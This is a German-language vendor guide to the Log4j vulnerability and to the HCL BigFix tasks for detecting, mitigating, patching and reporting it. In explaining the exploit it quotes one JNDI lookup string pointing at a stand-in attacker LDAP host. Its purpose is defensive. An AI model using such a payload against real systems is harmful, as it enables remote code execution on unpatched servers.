HCL BigFix Guide

Warum handelt es sich dabei?

Hierbei handelt es sich um eine Schwachstelle, die in Apache Log4j entdeckt wurde, der beliebten Java-Bibliothek, die von der Apache Foundation entwickelt und verwaltet wird. Die Log4j-Bibliothek wird in vielen kommerziellen und Open-Source-Softwareprodukten als Java-Protokollierungsroutine verwendet. Die Kritikalität der Schwachstelle hat im MITRE.org Common Vulnerability Scoring System (CVSS) eine Schweregradpunktzahl von 10/10.  

Wie wird sie ausgenutzt?

Log4j kann von einem nicht authentifizierten Gegner mittels Remotecodeausführung (RCE) aus der Ferne ausgenutzt werden. Wenn ein Angreifer eine Nachricht sendet, die eine Zeichenfolge wie ${jndi:ldap://dirtyLDAP.com/X}) enthält, kann eine externe Codeklasse oder Nachrichtensuche zur Ausführung schädlichen Codes OHNE Authentifizierung führen.

Wer ist betroffen?

Hunderte Millionen Geräte sind gefährdet, einschließlich solcher in Regierungsbehörden, kommerziellen und privaten Computern. Darüber hinaus kann jedes betroffene Gerät Dutzende oder Hunderte von Stellen enthalten, an denen der anfällige Code existiert, da Logging eine äußerst häufige Aktion in der Informatik ist.

Wie kann HCL BigFix helfen?

Das HCL BigFix-Team arbeitet gemeinsam mit unseren Kunden, Sicherheitsexperten und IT Operations an der Erstellung von HCL BigFix-Inhalten, um Ihnen dabei zu helfen, die Log4j-Schwachstellen in Ihrer Umgebung zu identifizieren und zu beheben.

HCL BigFix ist das wesentliche Tool für IT Operations. HCL BigFix automatisiert die Erkennung, Verwaltung und Behebung aller Endpunkte, ob On-Premise, mobil, virtuell oder in der Cloud – unabhängig von Betriebssystem, Standort und Konnektivität. Mit HCL BigFix Insights for Vulnerability Remediation, das in führende Lösungen für das Schwachstellenmanagement wie Tenable integriert werden kann, können Schwachstellen wie Log4j schneller behoben werden als mit jeder anderen Lösung auf dem Markt.

Mit HCL BigFix können Sie Schwachstellen erkennen, entschärfen, beheben, Berichte vor und nach der Behebung erstellen und geschützte Endpunkte sichern.

ERKENNUNG

HCL BigFix hat Aufgaben entwickelt, um HCL BigFix-Nutzer bei der Erkennung von Log4J-Instanzen und -Schwachstellen zu unterstützen. Wir haben den Logpresso Log4j-Scanner verwendet, da es sich um einen Open-Source-Scanner handelt, der auf GitHub verfügbar ist, von dem Logpresso-Technikteam entwickelt wurde und der der Cybersicherheits-Community kostenlos zur Verfügung steht.

Diese Aufgaben laden eine temporäre Java-Laufzeitumgebung herunter, um den Scan auszuführen, und erfordern keine Installation von Java auf dem System. Diese Aufgaben funktionieren unter Windows 8.1 und höher (x86 und x64), Mac OS X, Linux (x86, x64, armv71, ppc64, ppc64LE und s390x), AIX 7.1 TL4 und höher und Solaris (x86 und SPARC). Mit einem manuellen Download der JRE können die Aufgaben auch auf HP-UX ausgeführt werden.

In den folgenden vier Schritten wird der allgemeine Prozess zur Erkennung und Meldung der Schwachstelle erläutert:
 

1. Führen Sie die Aufgabe 602 „Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – SCAN only“ von der "BES Inventory and License" Content-Site aus.

2. Aktivieren Sie die Analyse 601 „log4j2-scan results“ von der "BES Inventory and License" Content-Site.

3. Nachdem die Scan-Ergebnisse auf den HCL BigFix Server hochgeladen wurden, sehen Sie sich die detaillierten Scan-Ergebnisse in der Analyse an. Siehe Bild unten.

4. Für Executive Reporting verwenden Sie die Ansicht „Log4j Vulnerability Report (Logpresso Scan)“, die in den HCL BigFix Web Reports bereitgestellt wird.

ENTSCHÄRFUNG

Bevor Patches von den Anwendungsanbietern bereitgestellt werden, gibt es zwei Möglichkeiten, das Log4J-Risiko zu mindern:

1. Verwenden Sie das Dienstprogramm Logpresso Log4j-scan, um anfällige Java-Klassen aus den betroffenen Log4j-core JAR-Dateien zu entfernen. Die dafür vorgesehene Aufgabe HCL BigFix ist auf der Inhaltsseite „BES Inventory and License“ verfügbar. Sie wird als Task 603 (Run: log4j2-scan v2.9.2 – Universal JAR – Download JRE – WITH REMEDIATION) bezeichnet.
Das Dienstprogramm Logpresso Log4j-scan kann einige Behebungen auf betroffenen Log4j-Core JAR-Bibliotheken sowohl für Log4j 2.x als auch Log4j 1.x durchführen. Das Dienstprogramm mildert das Schlimmste der CVEs, aber nicht alle Denial-of-Service-basierten Schwachstellen ab. Dennoch kann das Dienstprogramm ein sehr effektiver Schritt sein, um Schutz zu bieten und gleichzeitig die Abwärtskompatibilität mit vorhandenen Anwendungen aufrechtzuerhalten. Einzelheiten zu den spezifischen Minderungsmaßnahmen, die mit dem Tool durchgeführt werden können, finden Sie unter https://github.com/logpresso/CVE-2021-44228-Scanner.

2. Stoppen oder deaktivieren Sie die betroffenen Anwendungen oder Dienste.
 

BEHEBUNG

Sobald die Anbieter Patches zur Verfügung stellen, wird HCL BigFix schnell HCL BigFix-Fixlets erstellen, testen und bereitstellen. Laden Sie die neueste Liste der HCL BigFix-Fixlets herunter, die Log4J-Schwachstellen beheben, von https://www.hcl-software.com/de/products/bigfix/log4j-ivr.

BERICHTERSTATTUNG

Mit BigFix können Berichte über die betroffenen Systeme und Bibliotheken über die HCL BigFix Web Reports angezeigt und archiviert werden, die den Status der Schwachstellen und Minderung zu verschiedenen Zeitpunkten anzeigen.

SCHUTZ

Sobald die Schwachstelle bereinigt wurde, kann HCL BigFix sicherstellen, dass sie nicht erneut auftritt. Mit BigFix können Sie regelmäßige Scans planen, indem Sie die verfügbare Erkennungsaufgabe verwenden, damit neue Systeme oder Software mit der Log4J-Schwachstelle identifiziert und bereinigt werden.

Wenn Sie weitere Hilfe benötigen, suchen Sie im HCL BigFix Forum, wenden Sie sich an HCL BigFix Professional Services oder kontakteren Sie den technischen Support.